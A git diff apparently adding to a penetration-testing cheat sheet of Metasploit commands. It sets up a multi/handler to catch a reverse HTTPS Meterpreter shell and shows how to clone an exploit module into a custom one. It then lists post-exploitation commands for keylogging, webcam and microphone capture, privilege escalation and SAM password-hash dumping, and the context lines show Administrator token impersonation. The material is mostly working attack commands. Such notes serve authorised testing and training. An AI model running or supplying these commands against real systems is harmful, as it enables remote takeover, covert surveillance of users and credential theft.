@@ -23,4 +23,39 @@ meterpreter > wdigest
23
23
meterpreter > use incognito
24
24
meterpreter > list_tokens -u
25
25
meterpreter > impersonate_token SERV-2K3\\Administrator
26
- execute -f cmd.exe -i -t
26
+ execute -f cmd.exe -i -t
27
+
28
+ Metasploit Exploit Multi Handler
29
+
30
+ multi/handler to accept an incoming reverse\_https\_meterpreter
31
+
32
+ `payload
33
+ use exploit/multi/handler
34
+ set PAYLOAD windows/meterpreter/reverse_https
35
+ set LHOST $ip
36
+ set LPORT 443
37
+ exploit
38
+ [*] Started HTTPS reverse handler on https://$ip:443/`
39
+
40
+ Building Your Own MSF Module
41
+
42
+ `mkdir -p ~/.msf4/modules/exploits/linux/misc
43
+ cd ~/.msf4/modules/exploits/linux/misc
44
+ cp
45
+ /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
46
+ ./crossfire.rb
47
+ nano crossfire.rb`
48
+
49
+ Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
50
+
51
+ `download` Download a file or directory
52
+ `upload` Upload a file or directory
53
+ `portfwd` Forward a local port to a remote service
54
+ `route` View and modify the routing table
55
+ `keyscan_start` Start capturing keystrokes
56
+ `keyscan_stop` Stop capturing keystrokes
57
+ `screenshot` Grab a screenshot of the interactive desktop
58
+ `record_mic` Record audio from the default microphone for X seconds
59
+ `webcam_snap` Take a snapshot from the specified webcam
60
+ `getsystem` Attempt to elevate your privilege to that of local system.
61
+ `hashdump` Dumps the contents of the SAM database
0 commit comments